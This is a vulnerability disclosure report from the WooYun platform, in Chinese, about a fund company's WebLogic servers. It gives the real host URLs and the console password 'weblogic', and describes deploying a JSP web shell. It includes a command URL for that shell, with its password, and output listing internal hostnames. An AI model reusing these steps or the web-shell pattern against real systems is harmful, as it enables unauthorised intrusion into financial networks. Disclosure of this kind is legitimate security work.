当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127745

漏洞标题:基金安全之易方达基金某系统漏洞直接Getshell可漫游内网

相关厂商:易方达基金管理有限公司

漏洞作者: 管管侠

提交时间:2015-07-19 20:42

修复时间:2015-09-03 08:54

公开时间:2015-09-03 08:54

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-19: 细节已通知厂商并且等待厂商处理中
2015-07-20: 厂商已经确认,细节仅向厂商公开
2015-07-30: 细节向核心白帽子及相关领域专家公开
2015-08-09: 细节向普通白帽子公开
2015-08-19: 细节向实习白帽子公开
2015-09-03: 细节向公众公开

简要描述:

可影响内网几十台服务器,考虑是基金业务,没敢多操作,仅作危害证明!!

详细说明:

http://wxtest.efunds.com.cn:7777/console/
http://wxtest.efunds.com.cn:8899/console/
账号密码:weblogic
直接部署shell
别看地址是测试地址,但是内网权限可不小

1.png


http://wxtest.efunds.com.cn:7777/is/cmd.jsp?pwd=023&cmd=whoami

2.png

漏洞证明:

http://wxtest.efunds.com.cn:7777/is/cmd.jsp?pwd=023&cmd=NET%20VIEW

3.png


服务器名称 注解
-------------------------------------------------------------------------------
\\10-99-48-119
\\10-99-48-127
\\D2
\\PSZ-DEV-003
\\PSZ-DEV-004
\\PSZ-HS-10
\\PSZ-HS-11
\\PSZ-HS-O32TEST
\\PSZ-HS-TEST-01
\\PSZ-TA-GUZHI-04
\\PSZ-TA4-CLI-01
\\RPC-TYDW-CHECK1
\\RPC-TYDW-CHECK3
\\RS-OADB-02
\\RS-W2K8-TEST-01
\\RSZ-O32CLI-03
\\RSZ-O32CLI-04
\\RSZ-O32CLI-05
\\RVPC-HSQD-02
\\RVPC-WIN7-IE-01
\\RVS-CC-TEST-01
\\RVS-DUDX-01
\\RVS-ETRADE-02
\\RVS-HSDB-TEST1
\\RVS-INFODB-01
\\RVS-KFDESKTOP-1
\\RVS-KFDESKTOP-2
\\RVS-KFDESKTOP-3
\\RVS-OA-APP-2
\\RVS-SALE-BS-01
\\RVS-SALE-BS-02
\\RVS-SZT-01
\\RVS-TA-02
\\RVS-TEXUDO-02
\\RVS-TEXUDO-CLI1
\\RVS-TEXUDO-CLI2
\\RVS-TYDW-LIUHZ
\\RVS-W3-FAX-01
\\RVS-WEBLOGIC-1
\\RVS-WEBLOGIC-2
\\VIEW-TEST
\\VPC-ZT-TRADE-02
\\VS-CJ-RISKAPP
\\VS-COSNOLE-01
\\VS-OMS-APP-01
\\VS-PROP-TEST
\\VS-TYGL-APP-01
\\VSZ-APACHE-TEST
\\VSZ-HS-09
\\VSZ-ICBC-BF-02
\\VSZ-ICBC-TEST-1
\\VSZ-ICBC-TEST-2
\\VSZ-INDEXO32-01
\\VSZ-INDEXO32-02
\\VSZ-JZPL-01
\\VSZ-LOADAPP-01
\\VSZ-LTF-01
\\VSZ-QR-01
\\VSZ-SFSALE-APP1
\\VSZ-TA-CLIENT01
\\VSZ-TA-CLIENT02
\\VSZ-TA-CLIENT03
\\VSZ-TA-GUZHI-02
\\VSZ-TA-GUZHI-03
\\VSZ-TA4-CLI-01
\\VSZ-TA4-CLI-02
\\VSZ-TYTEST-01
\\VSZ-TYTEST-02
\\VSZ-XT-TEST01
\\VXT-INDEXMGT-01
命令成功完成。

4.png


其实可以操神器弹出代理漫游内网,内网系统的漏洞就更不用说了
或者直接读取数据库配置去连接数据库,
考虑基金业务,就没再搞了,不要怀疑我的能力
我是 @管管侠 !!

修复方案:

@@
最近在看基金行业的安全,确实也都是漏洞百出

版权声明:转载请注明来源 管管侠@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-07-20 08:53

厂商回复:

感谢wooyun提醒。

最新状态:

暂无